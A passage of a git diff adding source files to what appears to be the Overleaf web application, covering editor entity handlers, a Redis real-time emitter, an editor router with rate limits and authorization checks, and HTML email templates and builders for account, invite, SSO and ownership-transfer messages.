SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.renameEntity( + projectId, + entityId, + entityType, + name, + userId, + source + ) + res.sendStatus(204) +} + +async function moveEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const folderId = req.body.folder_id + const source = req.body.source ?? 'editor' + const userId = SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.moveEntity( + projectId, + entityId, + folderId, + entityType, + userId, + source + ) + res.sendStatus(204) +} + +async function deleteDoc(req, res, next) { + req.params.entity_type = 'doc' + await deleteEntity(req, res, next) +} + +async function deleteFile(req, res, next) { + req.params.entity_type = 'file' + await deleteEntity(req, res, next) +} + +async function deleteFolder(req, res, next) { + req.params.entity_type = 'folder' + await deleteEntity(req, res, next) +} + +async function deleteEntity(req, res, next) { + const projectId = req.params.Project_id + const entityId = req.params.entity_id + const entityType = req.params.entity_type + const userId = SessionManager.getLoggedInUserId(req.session) + await EditorController.promises.deleteEntity( + projectId, + entityId, + entityType, + 'editor', + userId + ) + res.sendStatus(204) +} + +const supportedSpellCheckLanguages = new Set( + Settings.languages + // only include spell-check languages that are available in the client + .filter(language => language.dic !== undefined) + .map(language => language.code) +) + +async function chooseSpellCheckLanguage(spellCheckLanguage) { + if (supportedSpellCheckLanguages.has(spellCheckLanguage)) { + return spellCheckLanguage + } + + // Preserve the value in the database so they can use it again once we add back support. + // Map some server-only languages to a specific variant, or disable spell checking for currently unsupported spell check languages. + switch (spellCheckLanguage) { + case 'en': + // map "English" to "English (American)" + return 'en_US' + + case 'no': + // map "Norwegian" to "Norwegian (Bokmål)" + return 'nb_NO' + + default: + // map anything else to "off" + return '' + } +} diff --git a/services/web/app/src/Features/Editor/EditorRealTimeController.js b/services/web/app/src/Features/Editor/EditorRealTimeController.js new file mode 100644 index 0000000..086870e --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorRealTimeController.js @@ -0,0 +1,50 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let EditorRealTimeController +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const rclient = RedisWrapper.client('pubsub') +const os = require('os') +const crypto = require('crypto') + +const HOST = os.hostname() +const RND = crypto.randomBytes(4).toString('hex') // generate a random key for this process +let COUNT = 0 + +module.exports = EditorRealTimeController = { + emitToRoom(roomId, message, ...payload) { + // create a unique message id using a counter + const messageId = `web:${HOST}:${RND}-${COUNT++}` + let channel + if (roomId === 'all' || !Settings.publishOnIndividualChannels) { + channel = 'editor-events' + } else { + channel = `editor-events:${roomId}` + } + const blob = JSON.stringify({ + room_id: roomId, + message, + payload, + _id: messageId, + }) + Metrics.summary('redis.publish.editor-events', blob.length, { + status: message, + }) + return rclient.publish(channel, blob) + }, + + emitToAll(message, ...payload) { + return this.emitToRoom('all', message, ...Array.from(payload)) + }, +} diff --git a/services/web/app/src/Features/Editor/EditorRouter.mjs b/services/web/app/src/Features/Editor/EditorRouter.mjs new file mode 100644 index 0000000..4a75c19 --- /dev/null +++ b/services/web/app/src/Features/Editor/EditorRouter.mjs @@ -0,0 +1,86 @@ +import EditorHttpController from './EditorHttpController.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import { validate, Joi } from '../../infrastructure/Validation.js' + +const rateLimiters = { + addDocToProject: new RateLimiter('add-doc-to-project', { + points: 30, + duration: 60, + }), + addFolderToProject: new RateLimiter('add-folder-to-project', { + points: 60, + duration: 60, + }), + joinProject: new RateLimiter('join-project', { points: 45, duration: 60 }), +} + +export default { + apply(webRouter, privateApiRouter) { + webRouter.post( + '/project/:Project_id/doc', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.addDocToProject, { + params: ['Project_id'], + }), + EditorHttpController.addDoc + ) + webRouter.post( + '/project/:Project_id/folder', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + RateLimiterMiddleware.rateLimit(rateLimiters.addFolderToProject, { + params: ['Project_id'], + }), + EditorHttpController.addFolder + ) + + webRouter.post( + '/project/:Project_id/:entity_type/:entity_id/rename', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.renameEntity + ) + webRouter.post( + '/project/:Project_id/:entity_type/:entity_id/move', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.moveEntity + ) + + webRouter.delete( + '/project/:Project_id/file/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteFile + ) + webRouter.delete( + '/project/:Project_id/doc/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteDoc + ) + webRouter.delete( + '/project/:Project_id/folder/:entity_id', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + EditorHttpController.deleteFolder + ) + + // Called by the real-time API to load up the current project state. + // This is a post request because it's more than just a getting of data. We take actions + // whenever a user joins a project, like updating the deleted status. + privateApiRouter.post( + '/project/:Project_id/join', + AuthenticationController.requirePrivateApiAuth(), + RateLimiterMiddleware.rateLimit(rateLimiters.joinProject, { + params: ['Project_id'], + // keep schema in sync with controller + getUserId: req => req.body.userId, + }), + validate({ + body: Joi.object({ + userId: Joi.string().required(), + anonymousAccessToken: Joi.string().optional(), + }), + }), + EditorHttpController.joinProject + ) + }, +} diff --git a/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js b/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js new file mode 100644 index 0000000..fb68ecc --- /dev/null +++ b/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js @@ -0,0 +1,46 @@ +const _ = require('lodash') + +module.exports = _.template(`\ + <table class="row" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"> + <tbody> + <tr style="padding: 0; vertical-align: top;"> + <th class="small-12 columns" style="line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 16px; padding-left: 16px; padding-right: 16px; text-align: left; width: 564px;"> + <table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <th style="margin: 0; padding: 0; text-align: left;"> + <% if (title) { %> + <h3 class="force-overleaf-style" style="margin: 0; color: #5D6879; font-family: Georgia, serif; font-size: 24px; font-weight: normal; line-height: 1.3; padding: 0; text-align: left; word-wrap: normal;"> + <%= title %> + </h3> + <% } %> + </th> + <tr> + <td> + <p style="height: 20px; margin: 0; padding: 0;"> </p> + + <% if (greeting) { %> + <p style="margin: 0 0 10px 0; padding: 0;"> + <%= greeting %> + </p> + <% } %> + + <% (message).forEach(function(paragraph) { %> + <p class="force-overleaf-style" style="margin: 0 0 10px 0; padding: 0;"> + <%= paragraph %> + </p> + <% }) %> + <% if (highlightedText) { %> + <div style="text-align: center; color: #1B222C; font-size: 20px; margin: 16px 0; padding: 16px 8px; border-radius: 8px; background: #F4F5F6;"> + <b><%= highlightedText %></b> + </div> + <% } %> + </td> + </tr> + </tr> + </table> + </th> + </tr> + </tbody> + </table> +\ +`) diff --git a/services/web/app/src/Features/Email/Bodies/cta-email.js b/services/web/app/src/Features/Email/Bodies/cta-email.js new file mode 100644 index 0000000..346793c --- /dev/null +++ b/services/web/app/src/Features/Email/Bodies/cta-email.js @@ -0,0 +1,96 @@ +const _ = require('lodash') + +module.exports = _.template(`\ + <table class="row" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"> + <tbody> + <tr style="padding: 0; vertical-align: top;"> + <th class="small-12 columns" style="line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 16px; padding-left: 16px; padding-right: 16px; text-align: left;"> + <table class="cta-table" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <th style="margin: 0; padding: 0; text-align: left;"> + <% if (title) { %> + <h3 class="force-overleaf-style" style="margin: 0; color: #5D6879; font-family: Georgia, serif; font-size: 24px; font-weight: normal; line-height: 1.3; padding: 0; text-align: left; word-wrap: normal;"> + <%= title %> + </h3> + <% } %> + </th> + <tr> + <td> + <p style="height: 20px; margin: 0; padding: 0;"> </p> + + <% if (greeting) { %> + <p style="margin: 0 0 10px 0; padding: 0;"> + <%= greeting %> + </p> + <% } %> + + <% (message).forEach(function(paragraph) { %> + <p class="force-overleaf-style" style="margin: 0 0 10px 0; padding: 0;"> + <%= paragraph %> + </p> + <% }) %> + + <p style="margin: 0; padding: 0;"> </p> + + <table style="border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: auto;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td style="-moz-hyphens: auto; -webkit-hyphens: auto; border-collapse: collapse !important; border-radius: 9999px; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td style="-moz-hyphens: auto; -webkit-hyphens: auto; background: #4F9C45; border: none; border-collapse: collapse !important; border-radius: 9999px; color: #fefefe; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <a href="<%= ctaURL %>" style="border: 0 solid #4F9C45; border-radius: 9999px; color: #fefefe; display: inline-block; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: bold; line-height: 1.3; margin: 0; padding: 8px 16px 8px 16px; text-align: left; text-decoration: none;"> + <%= ctaText %> + </a> + </td> + </tr> + </table> + </td> + </tr> + </table> + + <% if (secondaryMessage && secondaryMessage.length > 0) { %> + <p style="margin: 0; padding: 0;"> </p> + + <% (secondaryMessage).forEach(function(paragraph) { %> + <p class="force-overleaf-style"> + <%= paragraph %> + </p> + <% }) %> + <% } %> + + <p style="margin: 0; padding: 0;"> </p> + + <p class="force-overleaf-style" style="font-size: 12px;"> + If the button above does not appear, please copy and paste this link into your browser's address bar: + </p> + + <p class="force-overleaf-style" style="font-size: 12px;"> + <%= ctaURL %> + </p> + </td> + </tr> + </tr> + </table> + </th> + </tr> + </tbody> + </table> + <% if (gmailGoToAction) { %> + <script type="application/ld+json"> + <%= + StringHelper.stringifyJsonForScript({ + "@context": "http://schema.org", + "@type": "EmailMessage", + "potentialAction": { + "@type": "ViewAction", + "target": gmailGoToAction.target, + "url": gmailGoToAction.target, + "name": gmailGoToAction.name + }, + "description": gmailGoToAction.description + }) + %> + </script> + <% } %> +\ +`) diff --git a/services/web/app/src/Features/Email/EmailBuilder.js b/services/web/app/src/Features/Email/EmailBuilder.js new file mode 100644 index 0000000..0e46b1b --- /dev/null +++ b/services/web/app/src/Features/Email/EmailBuilder.js @@ -0,0 +1,971 @@ +const _ = require('lodash') +const settings = require('@overleaf/settings') +const moment = require('moment') +const EmailMessageHelper = require('./EmailMessageHelper') +const StringHelper = require('../Helpers/StringHelper') +const BaseWithHeaderEmailLayout = require('./Layouts/BaseWithHeaderEmailLayout') +const SpamSafe = require('./SpamSafe') +const ctaEmailBody = require('./Bodies/cta-email') +const NoCTAEmailBody = require('./Bodies/NoCTAEmailBody') + +function _emailBodyPlainText(content, opts, ctaEmail) { + let emailBody = `${content.greeting(opts, true)}` + emailBody += `\r\n\r\n` + emailBody += `${content.message(opts, true).join('\r\n\r\n')}` + + if (ctaEmail) { + emailBody += `\r\n\r\n` + emailBody += `${content.ctaText(opts, true)}: ${content.ctaURL(opts, true)}` + } + + if ( + content.secondaryMessage(opts, true) && + content.secondaryMessage(opts, true).length > 0 + ) { + emailBody += `\r\n\r\n` + emailBody += `${content.secondaryMessage(opts, true).join('\r\n\r\n')}` + } + + emailBody += `\r\n\r\n` + emailBody += `Regards,\r\nThe ${settings.appName} Team - ${settings.siteUrl}` + + if ( + settings.email && + settings.email.template && + settings.email.template.customFooter + ) { + emailBody += `\r\n\r\n` + emailBody += settings.email.template.customFooter + } + + return emailBody +} + +function ctaTemplate(content) { + if ( + !content.ctaURL || + !content.ctaText || + !content.message || + !content.subject + ) { + throw new Error('missing required CTA email content') + } + if (!content.title) { + content.title = () => {} + } + if (!content.greeting) { + content.greeting = () => 'Hi,' + } + if (!content.secondaryMessage) { + content.secondaryMessage = () => [] + } + if (!content.gmailGoToAction) { + content.gmailGoToAction = () => {} + } + return { + subject(opts) { + return content.subject(opts) + }, + layout: BaseWithHeaderEmailLayout, + plainTextTemplate(opts) { + return _emailBodyPlainText(content, opts, true) + }, + compiledTemplate(opts) { + return ctaEmailBody({ + title: content.title(opts), + greeting: content.greeting(opts), + message: content.message(opts), + secondaryMessage: content.secondaryMessage(opts), + ctaText: content.ctaText(opts), + ctaURL: content.ctaURL(opts), + gmailGoToAction: content.gmailGoToAction(opts), + StringHelper, + }) + }, + } +} + +function NoCTAEmailTemplate(content) { + if (content.greeting == null) { + content.greeting = () => 'Hi,' + } + if (!content.message) { + throw new Error('missing message') + } + return { + subject(opts) { + return content.subject(opts) + }, + layout: BaseWithHeaderEmailLayout, + plainTextTemplate(opts) { + return `\ +${content.greeting(opts)} + +${content.message(opts, true).join('\r\n\r\n')} + +Regards, +The ${settings.appName} Team - ${settings.siteUrl}\ + ` + }, + compiledTemplate(opts) { + return NoCTAEmailBody({ + title: + typeof content.title === 'function' ? content.title(opts) : undefined, + greeting: content.greeting(opts), + highlightedText: + typeof content.highlightedText === 'function' + ? content.highlightedText(opts) + : undefined, + message: content.message(opts), + StringHelper, + }) + }, + } +} + +function buildEmail(templateName, opts) { + const template = templates[templateName] + opts.siteUrl = settings.siteUrl + opts.body = template.compiledTemplate(opts) + return { + subject: template.subject(opts), + html: template.layout(opts), + text: template.plainTextTemplate && template.plainTextTemplate(opts), + } +} + +const templates = {} + +templates.registered = ctaTemplate({ + subject() { + return `Activate your ${settings.appName} Account` + }, + message(opts) { + return [ + `Congratulations, you've just had an account created for you on ${ + settings.appName + } with the email address '${_.escape(opts.to)}'.`, + 'Click here to set your password and log in:', + ] + }, + secondaryMessage() { + return [ + `If you have any questions or problems, please contact ${settings.adminEmail}`, + ] + }, + ctaText() { + return 'Set password' + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, +}) + +templates.canceledSubscription = ctaTemplate({ + subject() { + return `${settings.appName} thoughts` + }, + message() { + return [ + `We are sorry to see you cancelled your ${settings.appName} premium subscription. Would you mind giving us some feedback on what the site is lacking at the moment via this quick survey?`, + ] + }, + secondaryMessage() { + return ['Thank you in advance!'] + }, + ctaText() { + return 'Leave Feedback' + }, + ctaURL(opts) { + return 'https://docs.google.com/forms/d/e/1FAIpQLSfa7z_s-cucRRXm70N4jEcSbFsZeb0yuKThHGQL8ySEaQzF0Q/viewform?usp=sf_link' + }, +}) + +templates.reactivatedSubscription = ctaTemplate({ + subject() { + return `Subscription Reactivated - ${settings.appName}` + }, + message(opts) { + return ['Your subscription was reactivated successfully.'] + }, + ctaText() { + return 'View Subscription Dashboard' + }, + ctaURL(opts) { + return `${settings.siteUrl}/user/subscription` + }, +}) + +templates.passwordResetRequested = ctaTemplate({ + subject() { + return `Password Reset - ${settings.appName}` + }, + title() { + return 'Password Reset' + }, + message() { + return [`We got a request to reset your ${settings.appName} password.`] + }, + secondaryMessage() { + return [ + "If you ignore this message, your password won't be changed.", + "If you didn't request a password reset, let us know.", + ] + }, + ctaText() { + return 'Reset password' + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, +}) + +templates.confirmEmail = ctaTemplate({ + subject() { + return `Confirm Email - ${settings.appName}` + }, + title() { + return 'Confirm Email' + }, + message(opts) { + return [ + `Please confirm that you have added a new email, ${opts.to}, to your ${settings.appName} account.`, + ] + }, + secondaryMessage() { + return [ + `If you did not request this, please let us know at <a href="mailto:${settings.adminEmail}">${settings.adminEmail}</a>.`, + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, + ctaText() { + return 'Confirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.confirmCode = NoCTAEmailTemplate({ + greeting(opts) { + return '' + }, + subject(opts) { + return `Confirm your email address on Overleaf (${opts.confirmCode})` + }, + title(opts) { + return 'Confirm your email address' + }, + message(opts, isPlainText) { + const msg = opts.welcomeUser + ? [ + `Welcome to Overleaf! We're so glad you joined us.`, + 'Use this 6-digit confirmation code to finish your setup.', + ] + : ['Use this 6-digit code to confirm your email address.'] + + if (isPlainText && opts.confirmCode) { + msg.push(opts.confirmCode) + } + return msg + }, + highlightedText(opts) { + return opts.confirmCode + }, +}) + +templates.projectInvite = ctaTemplate({ + subject(opts) { + const safeName = SpamSafe.isSafeProjectName(opts.project.name) + const safeEmail = SpamSafe.isSafeEmail(opts.owner.email) + + if (safeName && safeEmail) { + return `"${_.escape(opts.project.name)}" — shared by ${_.escape( + opts.owner.email + )}` + } + if (safeName) { + return `${settings.appName} project shared with you — "${_.escape( + opts.project.name + )}"` + } + if (safeEmail) { + return `${_.escape(opts.owner.email)} shared an ${ + settings.appName + } project with you` + } + + return `An ${settings.appName} project has been shared with you` + }, + title(opts) { + return 'Project Invite' + }, + greeting(opts) { + return '' + }, + message(opts, isPlainText) { + // build message depending on spam-safe variables + const message = [`You have been invited to an ${settings.appName} project.`] + + if (SpamSafe.isSafeProjectName(opts.project.name)) { + message.push('<br/> Project:') + message.push(`<b>${_.escape(opts.project.name)}</b>`) + } + + if (SpamSafe.isSafeEmail(opts.owner.email)) { + message.push(`<br/> Shared by:`) + message.push(`<b>${_.escape(opts.owner.email)}</b>`) + } + + if (message.length === 1) { + message.push('<br/> Please view the project to find out more.') + } + + return message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + }, + ctaText() { + return 'View project' + }, + ctaURL(opts) { + return opts.inviteUrl + }, + gmailGoToAction(opts) { + return { + target: opts.inviteUrl, + name: 'View project', + description: `Join ${_.escape( + SpamSafe.safeProjectName(opts.project.name, 'project') + )} at ${settings.appName}`, + } + }, +}) + +templates.reconfirmEmail = ctaTemplate({ + subject() { + return `Reconfirm Email - ${settings.appName}` + }, + title() { + return 'Reconfirm Email' + }, + message(opts) { + return [ + `Please reconfirm your email address, ${opts.to}, on your ${settings.appName} account.`, + ] + }, + secondaryMessage() { + return [ + 'If you did not request this, you can simply ignore this message.', + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, + ctaText() { + return 'Reconfirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.verifyEmailToJoinTeam = ctaTemplate({ + subject(opts) { + return `${opts.reminder ? 'Reminder: ' : ''}${_.escape( + _formatUserNameAndEmail(opts.inviter, 'A collaborator') + )} has invited you to join a group subscription on ${settings.appName}` + }, + title(opts) { + return `${opts.reminder ? 'Reminder: ' : ''}${_.escape( + _formatUserNameAndEmail(opts.inviter, 'A collaborator') + )} has invited you to join a group subscription on ${settings.appName}` + }, + message(opts) { + return [ + `Please click the button below to join the group subscription and enjoy the benefits of an upgraded ${settings.appName} account.`, + ] + }, + ctaText(opts) { + return 'Join now' + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, +}) + +templates.verifyEmailToJoinManagedUsers = ctaTemplate({ + subject(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + title(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + message(opts) { + return [ + `By joining this group, you'll have access to ${settings.appName} premium features such as additional collaborators, greater maximum compile time, and real-time track changes.`, + ] + }, + secondaryMessage(opts, isPlainText) { + const changeProjectOwnerLink = EmailMessageHelper.displayLink( + 'change project owner', + `${settings.siteUrl}/learn/how-to/How_to_Transfer_Project_Ownership`, + isPlainText + ) + + return [ + `<b>User accounts in this group are managed by ${_.escape( + _formatUserNameAndEmail(opts.admin, 'an admin') + )}</b>`, + `If you accept, you’ll transfer the management of your ${settings.appName} account to the owner of the group subscription, who will then have admin rights over your account and control over your stuff.`, + `If you have personal projects in your ${settings.appName} account that you want to keep separate, that’s not a problem. You can set up another account under a personal email address and change the ownership of your personal projects to the new account. Find out how to ${changeProjectOwnerLink}.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.inviteNewUserToJoinManagedUsers = ctaTemplate({ + subject(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + title(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + message(opts) { + return [''] + }, + secondaryMessage(opts) { + return [ + `<b>User accounts in this group are managed by ${_.escape( + _formatUserNameAndEmail(opts.admin, 'an admin') + )}.</b>`, + `If you accept, the owner of the group subscription will have admin rights over your account and control over your stuff.`, + `<b>What is ${settings.appName}?</b>`, + `${settings.appName} is the collaborative online LaTeX editor loved by researchers and technical writers. With thousands of ready-to-use templates and an array of LaTeX learning resources you’ll be up and running in no time.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.groupSSOLinkingInvite = ctaTemplate({ + subject(opts) { + const subjectPrefix = opts.reminder ? 'Reminder: ' : 'Action required: ' + return `${subjectPrefix}Authenticate your Overleaf account` + }, + title(opts) { + const titlePrefix = opts.reminder ? 'Reminder: ' : '' + return `${titlePrefix}Single sign-on enabled` + }, + message(opts) { + return [ + `Hi, + <div> + Your group administrator has enabled single sign-on for your group. + </div> + </br> + <div> + <strong>What does this mean for you?</strong> + </div> + </br> + <div> + You won't need to remember a separate email address and password to sign in to Overleaf. + All you need to do is authenticate your existing Overleaf account with your SSO provider. + </div> + `, + ] + }, + secondaryMessage(opts) { + return [``] + }, + ctaURL(opts) { + return opts.authenticateWithSSO + }, + ctaText(opts) { + return 'Authenticate with SSO' + }, + greeting() { + return '' + }, +}) + +templates.groupSSOReauthenticate = ctaTemplate({ + subject(opts) { + return 'Action required: Reauthenticate your Overleaf account' + }, + title(opts) { + return 'Action required: Reauthenticate SSO' + }, + message(opts) { + return [ + `Hi, + <div> + Single sign-on for your Overleaf group has been updated. + This means you need to reauthenticate your Overleaf account with your group’s SSO provider. + </div> + `, + ] + }, + secondaryMessage(opts) { + if (!opts.isManagedUser) { + return [''] + } else { + const passwordResetUrl = `${settings.siteUrl}/user/password/reset` + return [ + `If you’re not currently logged in to Overleaf, you'll need to <a href="${passwordResetUrl}">set a new password</a> to reauthenticate.`, + ] + } + }, + ctaURL(opts) { + return opts.authenticateWithSSO + }, + ctaText(opts) { + return 'Reauthenticate now' + }, + greeting() { + return '' + }, +}) + +templates.groupSSODisabled = ctaTemplate({ + subject(opts) { + if (opts.userIsManaged) { + return `Action required: Set your Overleaf password` + } else { + return 'A change to your Overleaf login options' + } + }, + title(opts) { + return `Single sign-on disabled` + }, + message(opts, isPlainText) { + const loginUrl = `${settings.siteUrl}/login` + let whatDoesThisMeanExplanation = [ + `You can still log in to Overleaf using one of our other <a href="${loginUrl}" style="color: #0F7A06; text-decoration: none;">login options</a> or with your email address and password.`, + `If you don't have a password, you can set one now.`, + ] + if (opts.userIsManaged) { + whatDoesThisMeanExplanation = [ + 'You now need an email address and password to sign in to your Overleaf account.', + ] + } + + const message = [ + 'Your group administrator has disabled single sign-on for your group.', + '<br/>', + '<b>What does this mean for you?</b>', + ...whatDoesThisMeanExplanation, + ] + + return message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + }, + secondaryMessage(opts) { + return [``] + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, + ctaText(opts) { + return 'Set your new password' + }, +}) + +templates.surrenderAccountForManagedUsers = ctaTemplate({ + subject(opts) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const toGroupName = opts.groupName ? ` to ${opts.groupName}` : '' + + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${admin} to transfer management of your ${ + settings.appName + } account${toGroupName}` + }, + title(opts) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const toGroupName = opts.groupName ? ` to ${opts.groupName}` : '' + + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${admin} to transfer management of your ${ + settings.appName + } account${toGroupName}` + }, + message(opts, isPlainText) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const managedUsersLink = EmailMessageHelper.displayLink( + 'user account management', + `${settings.siteUrl}/learn/how-to/Understanding_Managed_Overleaf_Accounts`, + isPlainText + ) + + return [ + `Your ${settings.appName} account ${_.escape( + opts.to + )} is part of ${admin}'s group. They’ve now enabled ${managedUsersLink} for the group. This will ensure that projects aren’t lost when someone leaves the group.`, + ] + }, + secondaryMessage(opts, isPlainText) { + const transferProjectOwnershipLink = EmailMessageHelper.displayLink( + 'change project owner', + `${settings.siteUrl}/learn/how-to/How_to_Transfer_Project_Ownership`, + isPlainText + ) + + return [ + `<b>What does this mean for you?</b>`, + `If you accept, you’ll transfer the management of your ${settings.appName} account to the owner of the group subscription, who will then have admin rights over your account and control over your stuff.`, + `If you have personal projects in your ${settings.appName} account that you want to keep separate, that’s not a problem. You can set up another account under a personal email address and change the ownership of your personal projects to the new account. Find out how to ${transferProjectOwnershipLink}.`, + `If you think this invitation has been sent in error please contact your group administrator.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.testEmail = ctaTemplate({ + subject() { + return `A Test Email from ${settings.appName}` + }, + title() { + return `A Test Email from ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message() { + return [`This is a test Email from ${settings.appName}`] + }, + ctaText() { + return `Open ${settings.appName}` + }, + ctaURL() { + return settings.siteUrl + }, +}) + +templates.ownershipTransferConfirmationPreviousOwner = NoCTAEmailTemplate({ + subject(opts) { + return `Project ownership transfer - ${settings.appName}` + }, + title(opts) { + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'Your project') + ) + return `${projectName} - Owner change` + }, + message(opts, isPlainText) { + const nameAndEmail = _.escape( + _formatUserNameAndEmail(opts.newOwner, 'a collaborator') + ) + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'your project') + ) + const projectNameDisplay = isPlainText + ? projectName + : `<b>${projectName}</b>` + return [ + `As per your request, we have made ${nameAndEmail} the owner of ${projectNameDisplay}.`, + `If you haven't asked to change the owner of ${projectNameDisplay}, please get in touch with us via ${settings.adminEmail}.`, + ] + }, +}) + +templates.ownershipTransferConfirmationNewOwner = ctaTemplate({ + subject(opts) { + return `Project ownership transfer - ${settings.appName}` + }, + title(opts) { + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'Your project') + ) + return `${projectName} - Owner change` + }, + message(opts, isPlainText) { + const nameAndEmail = _.escape( + _formatUserNameAndEmail(opts.previousOwner, 'A collaborator') + ) + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'a project') + ) + const projectNameEmphasized = isPlainText + ? projectName + : `<b>${projectName}</b>` + return [ + `${nameAndEmail} has made you the owner of ${projectNameEmphasized}. You can now manage ${projectName} sharing settings.`, + ] + }, + ctaText(opts) { + return 'View project' + }, + ctaURL(opts) { + const projectUrl = `${ + settings.siteUrl + }/project/${opts.project._id.toString()}` + return projectUrl + }, +}) + +templates.userOnboardingEmail = NoCTAEmailTemplate({ + subject(opts) { + return `Getting more out of ${settings.appName}` + }, + greeting(opts) { + return '' + }, + title(opts) { + return `Getting more out of ${settings.appName}` + }, + message(opts, isPlainText) { + const learnLatexLink = EmailMessageHelper.displayLink( + 'Learn LaTeX in 30 minutes', + `${settings.siteUrl}/learn/latex/Learn_LaTeX_in_30_minutes?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const templatesLinks = EmailMessageHelper.displayLink( + 'Find a beautiful template', + `${settings.siteUrl}/latex/templates?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const collaboratorsLink = EmailMessageHelper.displayLink( + 'Work with your collaborators', + 